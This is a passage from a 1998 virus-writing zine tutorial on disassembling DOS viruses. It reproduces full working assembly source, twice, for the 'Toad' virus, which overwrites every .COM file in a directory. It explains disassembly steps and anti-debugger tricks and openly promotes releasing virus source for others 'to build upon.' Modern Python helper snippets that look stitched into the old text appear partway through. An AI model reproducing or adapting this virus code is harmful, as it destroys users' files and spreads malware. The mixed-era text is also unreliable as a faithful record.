		mov     ah,4Fh                  ;function 4Fh-find next file
		jmp     find_file               ;jump to find next file to
						;infect
no_more_files:
		mov     ah,9                    ;function 9-write string to
						;standard output. ie: write a
						;message on the screen
		mov     dx,offset message       ;get the message from the 
						;data segment
		int     21h                     ;go dos! 
						;  
		int     20h                     ;int 20h-DOS program 
						;terminate
filespec        db      '*.com', 0
message         db      'Congratulations! You have infected all the COM files in 
this ',10,13, 
		db      'directory with the Toad instructional virus. Have a nice 
day.',10,13,'$' 

;here we just put the message back together in a more cohesive order and
;changed the hex 0Ah, 0Dh to its decimal equivalent: 10,13.
		     
end_virus label near                 ;just our   
				     ;formal closings
toad            endp                   
seg_a           ends
		end     find_file    ;makes sense yes?  
---------------------------------------------------------------------------- 

Now you see? It looks very clean and is even more legible than the code produced by Sourcer. All we have really done is replace the generic labels Sourcer assigned (such as data_1e) and the raw hexadecimal values (such as 0B4h) with expressive ones (such as offset end_virus - offset find_file). We have also corrected any small syntax errors Sourcer may have produced. This is the point at which we need to double-check that the code compiles and that the virus runs and infects properly. If bugs are encountered, we can use a debugger to walk through the executable step by step to see where we have strayed from the original and where specifically our errors lie. Alright, now it's time for the big test: let's compare our disassembly with Horny Toad's original source and see how it holds up.

 ----------------------------------------------------------------------------

 code    segment
	 assume  cs:code,ds:code
	 org     100h
 toad    proc    near

 first_fly:
	 mov     ah,4eh
 find_fly:
	 xor     cx,cx
	 lea     dx,comsig
	 int     21h
	 jc      wart_growth

 open_fly:
	 mov     ax,3d02h
	 mov     dx,9eh
	 int     21h

 eat_fly:
	 xchg    bx,ax
	 mov     ah,40h
	 mov     cx,offset horny - offset first_fly
	 lea     dx,first_fly
	 int     21h

 stitch_up:
	 mov     ah,3eh
	 int     21h
	 mov     ah,4fh
	 jmp     find_fly

 wart_growth:
	 mov     ah,09h
	 mov     dx,offset wart
	 int     21h

 cya:   
	 int     20h


comsig  db      "*.com",0
wart    db      'Congratulations! You have infected all the COM files in this 
',10,13
	db      'directory with the Toad instructional virus. Have a nice 
day.',10,13,'$'
 horny   label   near
 toad    endp
 code    ends
	 end     first_fly

 -----------------------------------------------------------------------------

Ahh...you see? Identical! That's right: using only the executable file TOAD.COM, I have derived the original source code instruction for instruction. As you have probably already guessed, this feat gets much harder as the complexity of the virus you are disassembling increases. However, using the same intuition we used to clean up this code, we can create logical patches and fixes for sections of the disassembler's output which would otherwise not function properly. This is the stage of disassembly where a secondary disassembler and a debugger come in very handy for finding the problem areas created by the initial disassembly. A true and accurate disassembly should use a debugger to verify the majority of the code produced by the disassembler.
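
A cheap extra check, which is our own addition and not part of the original workflow, is to compare the file you rebuilt from your cleaned listing against the original executable byte for byte. The sketch below assumes both files have already been read into memory; the function names are made up for illustration. It reports the first offset where the two differ, both as a file offset and as the in-memory offset of a .COM image loaded at 100h.

```python
def first_difference(original: bytes, rebuilt: bytes):
    """Return the offset of the first differing byte, or None if identical."""
    for offset, (a, b) in enumerate(zip(original, rebuilt)):
        if a != b:
            return offset
    # Same bytes so far, but one file is longer than the other.
    if len(original) != len(rebuilt):
        return min(len(original), len(rebuilt))
    return None


def report(original: bytes, rebuilt: bytes, load_base: int = 0x100) -> str:
    """Describe the first difference; load_base is 100h for a .COM image."""
    offset = first_difference(original, rebuilt)
    if offset is None:
        return "identical"
    return (f"first difference at file offset {offset:#06x} "
            f"(memory offset {offset + load_base:#06x})")


# Two encodings of the same four-byte opening; only the third byte differs.
print(report(b"\xb4\x4e\x33\xc9", b"\xb4\x4e\x31\xc9"))
```

A mismatch does not always mean a mistake in your listing. Some instructions have more than one valid encoding (xor cx,cx can be emitted as 33 C9 or as 31 C9), so two assemblers can produce different bytes from the same source line. Treat a reported difference as a place to look, not as proof of an error.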

Other things to be aware of:

There are a few other things we'd like to touch on before we draw this to a close. The first is simply that, especially when doing reverse engineering, it is important to understand the way a virus (or any program, for that matter) functions on a 'technical' level. By this we mean you should understand simple concepts that a surprising number of coders do not fully understand, i.e. hexadecimal values, segment addresses, and other basic aspects of the 8086 architecture. We mention these because gaps here are a very likely source of difficulty when making a disassembly. Allow me to illustrate with a simple example:

Suppose you came across this line of code in a disassembly:

mov dx,12Fh

O.K., so we know we are loading DX with the value 12Fh. A value like this is usually an offset that points at some data, so we go to offset 12Fh in the listing and we find:

 seg000:012F   db 2Ah
 seg000:0130   db 2Eh
 seg000:0131   db 63h
 seg000:0132   db 6Fh
 seg000:0133   db 6Dh
 seg000:0134   db 0

WTF is that? This is the point where most new coders stop and say "Fuck it anyways!", and it can be frustrating to see 50-200 lines of this, but with a bit of patience we can make it fall into place. It's really just ASCII text in hexadecimal form! Watch:

 db 2Ah ;*
 db 2Eh ;.
 db 63h ;c
 db 6Fh ;o
 db 6Dh ;m
 db 0   ;null byte, marks the end of the string

Of course! It's the filespec db '*.com',0, the type of file we are searching for. It was simply the form in which it was presented to us that was confusing. That is what much of reverse engineering is about: taking the code OUT of the machine language and putting it BACK into a more understandable human language. As for converting hex to ASCII and vice versa, many disassemblers will do it for you and some will not; in any case it is worthwhile to get a good book on assembly which includes a hex-to-ASCII table.
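
If your disassembler leaves you with raw db lines, the conversion is easy to script. Here is a minimal sketch, assuming you have the bytes of the .COM file in memory; the helper names are ours and purely illustrative. It also shows the one piece of arithmetic that trips people up: a .COM image is loaded at offset 100h, so memory offset 12Fh sits at file offset 2Fh.

```python
COM_LOAD_BASE = 0x100  # DOS loads a .COM image at offset 100h in its segment


def file_offset(memory_offset: int) -> int:
    """Convert an in-memory offset (as seen in the listing) to a file offset."""
    return memory_offset - COM_LOAD_BASE


def read_asciiz(image: bytes, memory_offset: int) -> str:
    """Read a null-terminated ASCII string starting at the given memory offset."""
    start = file_offset(memory_offset)
    end = image.index(0, start)  # position of the terminating 0 byte
    return image[start:end].decode("ascii")


# The six bytes from the dump above, placed where they would sit in the file.
# The 2Fh bytes of padding stand in for the code that precedes them.
dump = bytes([0x2A, 0x2E, 0x63, 0x6F, 0x6D, 0x00])
image = bytes(0x2F) + dump

print(read_asciiz(image, 0x12F))  # *.com
```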

Another thing to be aware of is some common errors made by disassemblers. One such error is when the disassembler decides to translate a block of assembly instructions as a block of data. When viewed, the block will look like a chunk of useless, meaningless data. Unfortunately, that chunk of "data" might be something as important as an interrupt handler. The key to understanding, or shall I say translating, the data is to look at the program code. Think to yourself: "What is missing in the program? How and when is the chunk of data being called?" You might even have to take a look at it through a debugger, and possibly surround the block with breakpoints to see what it actually affects. In the end, your only option might be to substitute the "data" with your own assembly instructions. Be very careful when attempting to do this.
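
One way to narrow down which db blocks deserve a closer look is to first rule out the ones that are plainly text. The sketch below is a rough heuristic of our own, not a feature of Sourcer or IDA: it lists the runs of printable ASCII in a blob, so that whatever is left over becomes a candidate for code that was mislabeled as data. The minimum run length is an assumption you can tune; it exists because opcode bytes often happen to be printable characters too.

```python
def printable_runs(blob: bytes, min_len: int = 4):
    """Return (offset, text) for each run of printable ASCII of at least min_len bytes."""
    runs = []
    start = None  # offset where the current printable run began, if any
    for i, b in enumerate(blob):
        if 0x20 <= b <= 0x7E:
            if start is None:
                start = i
        else:
            if start is not None and i - start >= min_len:
                runs.append((start, blob[start:i].decode("ascii")))
            start = None
    # A run that reaches the very end of the blob.
    if start is not None and len(blob) - start >= min_len:
        runs.append((start, blob[start:].decode("ascii")))
    return runs


# Four arbitrary non-text bytes (two of them happen to be printable),
# followed by a null-terminated string.
blob = b"\xb4\x4e\x33\xc9" + b"*.com\x00"
print(printable_runs(blob))  # [(4, '*.com')]
```

Anything this does not flag still has to be judged by hand, as described above. A block with no text in it may be code, a table of numbers, or padding.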

And yet another important fact to keep in mind when examining viruses is that many viruses quite literally do NOT want to be examined. That is to say, they have been programmed with many anti-anti-virus, anti-heuristic, anti-debugger, and anti-disassembler routines which make examination an even more difficult process, and sometimes even a risky one. The same rule we learned as children when dealing with wild animals applies here: if you cannot identify an animal, don't get close enough to let it harm you. This is a pretty safe rule to live by, but I'm sure some of you won't live by it, just as we didn't as children and don't now ;) Still, you should keep yourself on top of ideas and advances in armored programming. Most of the time armored programming is not harmful and just creates an immense amount of difficulty in examining the code. However, we have heard of and seen some pretty nasty tricks laid inside virii, waiting for the anti-virus researcher to examine them, such as hooking int 3 (the breakpoint interrupt, which debuggers rely on) and redirecting the debugger, when it is run on the virus, to do anything at all: from simply displaying a witty message on the debug screen and then exiting without allowing the code to be examined, all the way to wiping entire disks. Though it is fairly rare to come across a virus that will actually punish the reverse engineer, they do exist and we felt the necessity to inform you of their existence. Be smart, use your background knowledge of the virus you are examining, and we're sure that the beast won't bite back.

Hopefully, this has prepared you to begin doing quality disassemblies of virus code. You will learn A LOT about assembly language doing them, and you will be contributing to the VX community by making precise source code to popular and effective virii available again, for others to learn from and build upon. So until next time, viewing audience: the computer is a wonderful microcosm in which man can play god. Is the AV holding the hands of evolution back? Ask Darwin.

- Horny Toad and Opic [Codebreakers '98]